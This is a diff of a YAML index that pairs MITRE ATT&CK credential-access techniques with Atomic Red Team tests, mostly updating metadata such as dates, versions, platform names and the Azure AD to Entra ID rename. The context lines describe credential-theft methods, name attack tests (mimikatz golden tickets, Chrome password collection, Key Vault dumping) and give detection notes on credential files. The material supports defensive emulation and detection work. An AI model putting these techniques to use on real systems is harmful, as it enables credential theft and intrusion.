         SaaS and cloud platforms such as AWS and GCP, which will hand off the authentication
         process to AD FS and receive a token containing the hybrid users’ identity
         and privileges. \n\nBy modifying authentication processes tied to hybrid identities,
         an adversary may be able to establish persistent privileged access to cloud
         resources. For example, adversaries who compromise an on-premises server running
         a PTA agent may inject a malicious DLL into the `AzureADConnectAuthenticationAgentService`
-        process that authorizes all attempts to authenticate to Azure AD, as well
+        process that authorizes all attempts to authenticate to Entra ID, as well
         as records user credentials.(Citation: Azure AD Connect for Read Teamers)(Citation:
         AADInternals Azure AD On-Prem to Cloud) In environments using AD FS, an adversary
         may edit the `Microsoft.IdentityServer.Servicehost` configuration file to
@@ -91593,9 +92363,9 @@ credential-access:
         any set of claims, thereby bypassing multi-factor authentication and defined
         AD FS policies.(Citation: MagicWeb)\n\nIn some cases, adversaries may be able
         to modify the hybrid identity authentication process from the cloud. For example,
-        adversaries who compromise a Global Administrator account in an Azure AD tenant
+        adversaries who compromise a Global Administrator account in an Entra ID tenant
         may be able to register a new PTA agent via the web console, similarly allowing
-        them to harvest credentials and log into the Azure AD environment as any user.(Citation:
+        them to harvest credentials and log into the Entra ID environment as any user.(Citation:
         Mandiant Azure AD Backdoors)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
@@ -91604,21 +92374,22 @@ credential-access:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_contributors:
+      - Praetorian
+      x_mitre_deprecated: false
       x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
       - SaaS
-      - Google Workspace
-      - Office 365
       - IaaS
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_version: '1.0'
-      x_mitre_contributors:
-      - Praetorian
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Module: Module Load'
@@ -91658,55 +92429,10 @@ credential-access:
         url: https://www.mandiant.com/resources/detecting-microsoft-365-azure-active-directory-backdoors
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1555.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Ryan Benson, Exabeam
-      - Barry Shteiman, Exabeam
-      - Sylvain Gil, Exabeam
-      - RedHuntLabs, @redhuntlabs
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--58a3e6aa-4453-4cc8-a51f-4befe80b31a8
-      type: attack-pattern
-      created: '2020-02-12T18:57:36.041Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1555.003
-        url: https://attack.mitre.org/techniques/T1555/003
-      - source_name: Talos Olympic Destroyer 2018
-        url: https://blog.talosintelligence.com/2018/02/olympic-destroyer.html
-        description: Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer
-          Takes Aim At Winter Olympics. Retrieved March 14, 2019.
-      - source_name: Microsoft CryptUnprotectData April 2018
-        url: https://docs.microsoft.com/en-us/windows/desktop/api/dpapi/nf-dpapi-cryptunprotectdata
-        description: Microsoft. (2018, April 12). CryptUnprotectData function. Retrieved
-          June 18, 2019.
-      - source_name: Proofpoint Vega Credential Stealer May 2018
-        url: https://www.proofpoint.com/us/threat-insight/post/new-vega-stealer-shines-brightly-targeted-campaign
-        description: Proofpoint. (2018, May 10). New Vega Stealer shines brightly
-          in targeted campaign . Retrieved June 18, 2019.
-      - source_name: FireEye HawkEye Malware July 2017
-        url: https://www.fireeye.com/blog/threat-research/2017/07/hawkeye-malware-distributed-in-phishing-campaign.html
-        description: Swapnil Patil, Yogesh Londhe. (2017, July 25). HawkEye Credential
-          Theft Malware Distributed in Recent Phishing Campaign. Retrieved June 18,
-          2019.
-      - source_name: GitHub Mimikittenz July 2016
-        url: https://github.com/putterpanda/mimikittenz
-        description: Jamieson O'Reilly (putterpanda). (2016, July 4). mimikittenz.
-          Retrieved June 20, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-08-15T14:13:45.294Z'
       name: 'Credentials from Password Stores: Credentials from Web Browsers'
       description: "Adversaries may acquire credentials from web browsers by reading
         files specific to the target browser.(Citation: Talos Olympic Destroyer 2018)
@@ -91736,6 +92462,12 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_contributors:
+      - Ryan Benson, Exabeam
+      - Barry Shteiman, Exabeam
+      - Sylvain Gil, Exabeam
+      - RedHuntLabs, @redhuntlabs
+      x_mitre_deprecated: false
       x_mitre_detection: 'Identify web browser files that contain credentials such
         as Google Chrome’s Login Data database file: <code>AppData\Local\Google\Chrome\User
         Data\Default\Login Data</code>. Monitor file read events of web browser files
@@ -91745,18 +92477,53 @@ credential-access:
         reading web browser process memory, utilizing regular expressions, and those
         that contain numerous keywords for common web applications (Gmail, Twitter,
         Office365, etc.).'
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Process: Process Access'
       - 'File: File Access'
       - 'Process: OS API Execution'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--58a3e6aa-4453-4cc8-a51f-4befe80b31a8
+      created: '2020-02-12T18:57:36.041Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1555/003
+        external_id: T1555.003
+      - source_name: GitHub Mimikittenz July 2016
+        description: Jamieson O'Reilly (putterpanda). (2016, July 4). mimikittenz.
+          Retrieved June 20, 2019.
+        url: https://github.com/putterpanda/mimikittenz
+      - source_name: Talos Olympic Destroyer 2018
+        description: Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer
+          Takes Aim At Winter Olympics. Retrieved March 14, 2019.
+        url: https://blog.talosintelligence.com/2018/02/olympic-destroyer.html
+      - source_name: Microsoft CryptUnprotectData April 2018
+        description: Microsoft. (2018, April 12). CryptUnprotectData function. Retrieved
+          June 18, 2019.
+        url: https://docs.microsoft.com/en-us/windows/desktop/api/dpapi/nf-dpapi-cryptunprotectdata
+      - source_name: Proofpoint Vega Credential Stealer May 2018
+        description: Proofpoint. (2018, May 10). New Vega Stealer shines brightly
+          in targeted campaign . Retrieved June 18, 2019.
+        url: https://www.proofpoint.com/us/threat-insight/post/new-vega-stealer-shines-brightly-targeted-campaign
+      - source_name: FireEye HawkEye Malware July 2017
+        description: Swapnil Patil, Yogesh Londhe. (2017, July 25). HawkEye Credential
+          Theft Malware Distributed in Recent Phishing Campaign. Retrieved June 18,
+          2019.
+        url: https://www.fireeye.com/blog/threat-research/2017/07/hawkeye-malware-distributed-in-phishing-campaign.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1555.003
     atomic_tests:
     - name: Run Chrome-password Collector
@@ -92365,7 +93132,7 @@ credential-access:
           '
   T1557.003:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2024-09-12T19:46:04.759Z'
       name: DHCP Spoofing
       description: "Adversaries may redirect network traffic to adversary-owned systems
         by spoofing Dynamic Host Configuration Protocol (DHCP) traffic and acting
@@ -92402,23 +93169,23 @@ credential-access:
         phase_name: credential-access
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_contributors:
+      - Alex Spivakovsky, Pentera
+      - Andrew Allen, @whitehat_zero
+      x_mitre_deprecated: false
       x_mitre_detection: 'Monitor network traffic for suspicious/malicious behavior
         involving DHCP, such as changes in DNS and/or gateway parameters. Additionally,
         monitor Windows logs for Event IDs (EIDs) 1341, 1342, 1020 and 1063, which
         specify that the IP allocations are low or have run out; these EIDs may indicate
         a denial of service attack.(Citation: dhcp_serv_op_events)(Citation: solution_monitor_dhcp_scopes)'
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Linux
       - Windows
       - macOS
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
-      x_mitre_domains:
-      - enterprise-attack
       x_mitre_version: '1.1'
-      x_mitre_contributors:
-      - Alex Spivakovsky, Pentera
-      - Andrew Allen, @whitehat_zero
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
       - 'Application Log: Application Log Content'
@@ -92451,21 +93218,20 @@ credential-access:
       - source_name: solution_monitor_dhcp_scopes
         description: 'Shoemaker, E. (2015, December 31). Solution: Monitor DHCP Scopes
           and Detect Man-in-the-Middle Attacks with PRTG and PowerShell. Retrieved
-          March 7, 2022.'
-        url: https://lockstepgroup.com/blog/monitor-dhcp-scopes-and-detect-man-in-the-middle-attacks/
+          September 12, 2024.'
+        url: https://web.archive.org/web/20231202025258/https://lockstepgroup.com/blog/monitor-dhcp-scopes-and-detect-man-in-the-middle-attacks/
       - source_name: w32.tidserv.g
         description: Symantec. (2009, March 22). W32.Tidserv.G. Retrieved January
           14, 2022.
         url: https://web.archive.org/web/20150923175837/http://www.symantec.com/security_response/writeup.jsp?docid=2009-032211-2952-99&tabid=2
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1552.004:
     technique:
-      modified: '2023-04-12T23:52:08.194Z'
+      modified: '2024-10-04T11:31:56.622Z'
       name: 'Unsecured Credentials: Private Keys'
       description: "Adversaries may search for private key certificate files on compromised
         systems for insecurely stored credentials. Private cryptographic keys and
@@ -92476,7 +93242,7 @@ credential-access:
         as <code>~/.ssh</code> for SSH keys on * nix-based systems or <code>C:&#92;Users&#92;(username)&#92;.ssh&#92;</code>
         on Windows. Adversary tools may also search compromised systems for file extensions
         relating to cryptographic keys and certificates.(Citation: Kaspersky Careto)(Citation:
-        Palo Alto Prince of Persia)\n\nWhen a device is registered to Azure AD, a
+        Palo Alto Prince of Persia)\n\nWhen a device is registered to Entra ID, a
         device key and a transport key are generated and used to verify the device’s
         identity.(Citation: Microsoft Primary Refresh Token) An adversary with access
         to the device may be able to export the keys in order to impersonate the device.(Citation:
@@ -92510,7 +93276,7 @@ credential-access:
       - macOS
       - Windows
       - Network
-      x_mitre_version: '1.1'
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'File: File Access'
@@ -92538,7 +93304,7 @@ credential-access:
       - source_name: Kaspersky Careto
         description: Kaspersky Labs. (2014, February 11). Unveiling “Careto” - The
           Masked APT. Retrieved July 5, 2017.
-        url: https://kasperskycontenthub.com/wp-content/uploads/sites/43/vlpdfs/unveilingthemask_v1.0.pdf
+        url: https://web.archive.org/web/20141031134104/http://kasperskycontenthub.com/wp-content/uploads/sites/43/vlpdfs/unveilingthemask_v1.0.pdf
       - source_name: Microsoft Primary Refresh Token
         description: Microsoft. (2022, September 9). What is a Primary Refresh Token?.
           Retrieved February 21, 2023.
@@ -92549,9 +93315,8 @@ credential-access:
         url: https://en.wikipedia.org/wiki/Public-key_cryptography
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1552.004
     atomic_tests:
     - name: Private Keys
@@ -92983,7 +93748,7 @@ credential-access:
         elevation_required: true
   T1557.001:
     technique:
-      modified: '2023-04-25T14:00:00.188Z'
+      modified: '2022-10-25T15:46:55.393Z'
       name: 'Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay'
       description: "By responding to LLMNR/NBT-NS network traffic, adversaries may
         spoof an authoritative source for name resolution to force communication with
@@ -93091,7 +93856,6 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.0.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1557.001
     atomic_tests:
     - name: LLMNR Poisoning with Inveigh (PowerShell)
@@ -93110,7 +93874,7 @@ credential-access:
         elevation_required: true
   T1003.001:
     technique:
-      modified: '2023-12-27T17:57:20.003Z'
+      modified: '2024-08-13T13:52:45.379Z'
       name: 'OS Credential Dumping: LSASS Memory'
       description: |
         Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS). After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. These credential materials can be harvested by an administrative user or SYSTEM and used to conduct [Lateral Movement](https://attack.mitre.org/tactics/TA0008) using [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550).
@@ -93147,6 +93911,7 @@ credential-access:
       - Edward Millington
       - Ed Williams, Trustwave, SpiderLabs
       - Olaf Hartong, Falcon Force
+      - Michael Forret, Quorum Cyber
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor for unexpected processes interacting with LSASS.exe.(Citation: Medium Detecting Attempts to Steal Passwords from Memory) Common credential dumpers such as Mimikatz access LSASS.exe by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details are stored. Credential dumpers may also use methods for reflective [Process Injection](https://attack.mitre.org/techniques/T1055) to reduce potential indicators of malicious activity.
@@ -93159,7 +93924,7 @@ credential-access:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      x_mitre_version: '1.4'
+      x_mitre_version: '1.5'
       x_mitre_data_sources:
       - 'Process: Process Access'
       - 'Windows Registry: Windows Registry Key Modification'
@@ -93209,7 +93974,6 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1003.001
     atomic_tests:
     - name: Dump LSASS.exe Memory using ProcDump
@@ -93696,7 +94460,7 @@ credential-access:
         elevation_required: true
   T1110.003:
     technique:
-      modified: '2024-03-07T14:33:34.201Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Brute Force: Password Spraying'
       description: |-
         Adversaries may use a single or small list of commonly used passwords against many different accounts to attempt to acquire valid account credentials. Password spraying uses one password (e.g. 'Password01'), or a small list of commonly used passwords, that may match the complexity policy of the domain. Logins are attempted with that password against many different accounts on a network to avoid account lockouts that would normally occur when brute forcing a single account with many passwords. (Citation: BlackHillsInfosec Password Spraying)
@@ -93722,6 +94486,7 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Microsoft Threat Intelligence Center (MSTIC)
       - John Strand
@@ -93737,18 +94502,18 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '1.5'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Application Log: Application Log Content'
@@ -93775,9 +94540,6 @@ credential-access:
         url: https://www.us-cert.gov/ncas/alerts/TA18-086A
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1110.003
     atomic_tests:
     - name: Password Spray all Domain Users
@@ -94126,7 +94888,7 @@ credential-access:
         elevation_required: false
   T1056.003:
     technique:
-      modified: '2023-03-30T21:01:46.711Z'
+      modified: '2024-10-15T16:43:43.849Z'
       name: Web Portal Capture
       description: |-
         Adversaries may install code on externally facing portals, such as a VPN login page, to capture and transmit credentials of users who attempt to log into the service. For example, a compromised login page may log provided user credentials before logging the user in to the service.
@@ -94137,13 +94899,13 @@ credential-access:
         phase_name: collection
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_deprecated: false
       x_mitre_detection: File monitoring may be used to detect changes to files in
         the Web directory for organization login pages that do not match with authorized
         updates to the Web server's content.
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Linux
       - macOS
@@ -94157,6 +94919,7 @@ credential-access:
       id: attack-pattern--69e5226d-05dc-4f15-95d7-44f5ed78d06e
       created: '2020-02-11T18:59:50.058Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1056/003
@@ -94167,12 +94930,12 @@ credential-access:
         url: https://www.volexity.com/blog/2015/10/07/virtual-private-keylogging-cisco-web-vpns-leveraged-for-access-and-persistence/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1003.005:
     technique:
-      modified: '2024-04-18T23:47:54.553Z'
+      modified: '2024-10-15T14:18:59.123Z'
       name: 'OS Credential Dumping: Cached Domain Credentials'
       description: "Adversaries may attempt to access cached domain credentials used
         to allow authentication to occur in the event a domain controller is unavailable.(Citation:
@@ -94247,7 +95010,6 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1003.005
     atomic_tests:
     - name: Cached Credential Dump via Cmdkey
@@ -94309,7 +95071,7 @@ credential-access:
         url: https://gallery.technet.microsoft.com/scriptcenter/Kerberos-Golden-Ticket-b4814285
         description: Microsoft. (2015, March 24). Kerberos Golden Ticket Check (Updated).
           Retrieved February 27, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2020-11-05T16:07:03.779Z'
       name: 'Steal or Forge Kerberos Tickets: Golden Ticket'
       description: "Adversaries who have the KRBTGT account password hash may forge
         Kerberos ticket-granting tickets (TGT), also known as a golden ticket.(Citation:
@@ -94344,8 +95106,6 @@ credential-access:
       - 'Logon Session: Logon Session Metadata'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1558.001
     atomic_tests:
     - name: Crafting Active Directory golden tickets with mimikatz
@@ -94511,10 +95271,10 @@ credential-access:
           $env:TEMP\\golden.txt -ErrorAction Ignore\n"
   T1649:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Steal or Forge Authentication Certificates
       description: |-
-        Adversaries may steal or forge certificates used for authentication to access remote systems or resources. Digital certificates are often used to sign and encrypt messages and/or files. Certificates are also used as authentication material. For example, Azure AD device certificates and Active Directory Certificate Services (AD CS) certificates bind to an identity and can be used as credentials for domain accounts.(Citation: O365 Blog Azure AD Device IDs)(Citation: Microsoft AD CS Overview)
+        Adversaries may steal or forge certificates used for authentication to access remote systems or resources. Digital certificates are often used to sign and encrypt messages and/or files. Certificates are also used as authentication material. For example, Entra ID device certificates and Active Directory Certificate Services (AD CS) certificates bind to an identity and can be used as credentials for domain accounts.(Citation: O365 Blog Azure AD Device IDs)(Citation: Microsoft AD CS Overview)
 
         Authentication certificates can be both stolen and forged. For example, AD CS certificates can be stolen from encrypted storage (in the Registry or files)(Citation: APT29 Deep Look at Credential Roaming), misplaced certificate files (i.e. [Unsecured Credentials](https://attack.mitre.org/techniques/T1552)), or directly from the Windows certificate store via various crypto APIs.(Citation: SpecterOps Certified Pre Owned)(Citation: GitHub CertStealer)(Citation: GitHub GhostPack Certificates) With appropriate enrollment rights, users and/or machines within a domain can also request and/or manually renew certificates from enterprise certificate authorities (CA). This enrollment process defines various settings and permissions associated with the certificate. Of note, the certificate’s extended key usage (EKU) values define signing, encryption, and authentication use cases, while the certificate’s subject alternative name (SAN) values define the certificate owner’s alternate names.(Citation: Medium Certified Pre Owned)
 
@@ -94524,21 +95284,23 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_contributors:
+      - Tristan Bennett, Seamless Intelligence
+      - Lee Christensen, SpecterOps
+      - Thirumalai Natarajan, Mandiant
+      x_mitre_deprecated: false
       x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       - Linux
       - macOS
-      - Azure AD
-      x_mitre_is_subtechnique: false
-      x_mitre_deprecated: false
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_version: '1.1'
-      x_mitre_contributors:
-      - Tristan Bennett, Seamless Intelligence
-      - Lee Christensen, SpecterOps
-      - Thirumalai Natarajan, Mandiant
+      - Identity Provider
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Application Log: Application Log Content'
@@ -94587,9 +95349,6 @@ credential-access:
         url: https://www.mandiant.com/resources/blog/apt29-windows-credential-roaming
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1649
     atomic_tests:
     - name: Staging Local Certificates via Export-Certificate
@@ -94614,26 +95373,7 @@ credential-access:
         name: powershell
   T1552.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--8187bd2a-866f-4457-9009-86b0ddedffa3
-      type: attack-pattern
-      created: '2020-02-04T13:02:11.685Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1552.003
-        url: https://attack.mitre.org/techniques/T1552/003
-      - url: http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way
-        description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
-          DA, the OS X Way. Retrieved July 3, 2017.
-        source_name: External to DA, the OS X Way
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-09-12T15:24:04.912Z'
       name: 'Unsecured Credentials: Bash History'
       description: 'Adversaries may search the bash command history on compromised
         systems for insecurely stored credentials. Bash keeps track of the commands
@@ -94648,20 +95388,38 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_deprecated: false
       x_mitre_detection: Monitoring when the user's <code>.bash_history</code> is
         read can help alert to suspicious activity. While users do typically rely
         on their history of commands, they often access this history through other
         utilities like "history" instead of commands like <code>cat ~/.bash_history</code>.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'File: File Access'
       - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--8187bd2a-866f-4457-9009-86b0ddedffa3
+      created: '2020-02-04T13:02:11.685Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1552/003
+        external_id: T1552.003
+      - source_name: External to DA, the OS X Way
+        description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
+          DA, the OS X Way. Retrieved September 12, 2024.
+        url: https://www.slideshare.net/slideshow/external-to-da-the-os-x-way/62021418
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1552.003
     atomic_tests:
     - name: Search Through Bash History
@@ -94721,7 +95479,7 @@ credential-access:
         name: sh
   T1552.001:
     technique:
-      modified: '2024-04-15T21:33:00.213Z'
+      modified: '2024-10-15T14:28:43.639Z'
       name: 'Unsecured Credentials: Credentials In Files'
       description: |-
         Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.
@@ -94795,7 +95553,6 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1552.001
     atomic_tests:
     - name: Find AWS credentials
@@ -95059,11 +95816,10 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1528:
     technique:
-      modified: '2024-03-24T19:41:54.832Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Steal Application Access Token
       description: "Adversaries can steal application access tokens as a means of
         acquiring credentials to access remote systems and resources.\n\nApplication
@@ -95112,6 +95868,7 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Suzy Schapperle - Microsoft Azure Red Team
       - Shailesh Tiwary (Indian Army)
@@ -95120,6 +95877,7 @@ credential-access:
       - Saisha Agrawal, Microsoft Threat Intelligent Center (MSTIC)
       - Ram Pliskin, Microsoft Azure Security Center
       - Jack Burns, HubSpot
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Administrators should set up monitoring to trigger automatic alerts when policy criteria are met. For example, using a Cloud Access Security Broker (CASB), admins can create a “High severity app permissions” policy that generates alerts if apps request high severity permissions or send permissions requests for too many users.
@@ -95130,13 +95888,14 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - SaaS
-      - Office 365
-      - Azure AD
-      - Google Workspace
       - Containers
-      x_mitre_version: '1.3'
+      - IaaS
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Modification'
       - 'User Account: User Account Modification'
@@ -95192,9 +95951,6 @@ credential-access:
         url: https://docs.microsoft.com/en-us/azure/active-directory/develop/active-directory-v2-protocols
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1528
     atomic_tests:
     - name: Azure - Dump All Azure Key Vaults with Microburst
@@ -95268,37 +96024,7 @@ credential-access:
         elevation_required: true
   T1552.006:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--8d7bd4f5-3a89-4453-9c82-2c8894d5655e
-      type: attack-pattern
-      created: '2020-02-11T18:43:06.253Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
